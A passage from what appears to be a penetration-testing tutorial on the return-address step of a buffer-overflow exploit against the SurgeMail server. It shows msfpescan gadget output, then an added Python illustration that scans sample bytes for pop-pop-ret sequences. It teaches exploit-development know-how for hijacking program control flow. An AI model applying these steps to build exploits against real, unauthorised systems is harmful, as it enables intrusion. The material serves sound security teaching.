Getting a Return Address
The next step is to locate a POP-POP-RETN sequence in surgemail.exe. To do so, copy the executable to a location on your Back|Track machine, and then use the -p switch with msfpescan to locate a suitable candidate, as in the following example:
root@bt:/tmp# msfpescan -p surgemail.exe
[surgemail.exe]
0x0042e947 pop esi; pop ebp; ret
0x0042f88b pop esi; pop ebp; ret
0x00458e68 pop esi; pop ebp; ret
0x00458edb pop esi; pop ebp; ret
0x0046754d pop esi; pop ebp; ret
0x00467578 pop esi; pop ebp; ret
0x0046d204 pop eax; pop ebp; ret
. . . SNIP . . .
0x0078506e pop ebx; pop ebp; ret
0x00785105 pop ecx; pop ebx; ret
0x0078517e pop esi; pop ebx; ret
When msfpescan is run against the target executable, it reads through the machine ...
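To show what a scan of this kind is doing at the byte level, here is an added illustration (not code from the book or from Metasploit): single-byte x86 opcodes 0x58 through 0x5F encode pop r32, 0xC3 encodes ret, so a POP-POP-RETN candidate is simply three consecutive bytes of that shape, reported at image base plus offset. The input bytes are constructed for the example and are not taken from surgemail.exe.

```python
# Added example, not from the book: a minimal byte-level search for
# "pop r32; pop r32; ret" sequences, the pattern msfpescan -p reports.
# Single-byte opcode 0x58 + n is "pop" of the n-th register below.
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def disasm_pop(b):
    """Return 'pop <reg>' if b is a single-byte pop r32 opcode, else None."""
    if 0x58 <= b <= 0x5F:
        return "pop " + REGS[b - 0x58]
    return None


def find_pop_pop_ret(code, base_va):
    """Scan code bytes and return (address, text) for every pop; pop; ret
    sequence. base_va is the virtual address of code[0] (image base plus
    the section's RVA), so addresses print like the 0x0042e947 lines above."""
    hits = []
    for i in range(len(code) - 2):
        p1, p2 = disasm_pop(code[i]), disasm_pop(code[i + 1])
        if p1 and p2 and code[i + 2] == 0xC3:  # 0xC3 is ret
            hits.append((base_va + i, f"{p1}; {p2}; ret"))
    return hits


# Constructed sample (not real surgemail.exe bytes): filler, then
# "pop esi; pop ebp; ret" at offset 2 and "pop ebx; pop ebp; ret" at offset 7.
# The trailing "58 58 58" has no ret and so must not be reported.
SAMPLE = bytes.fromhex("90 90 5e 5d c3 90 c3 5b 5d c3 58 58 58")


def scan_sample(base_va=0x00400000):
    """Run the search over SAMPLE; base_va is an assumed image base."""
    return find_pop_pop_ret(SAMPLE, base_va)


if __name__ == "__main__":
    for va, text in scan_sample():
        print(f"0x{va:08x} {text}")
```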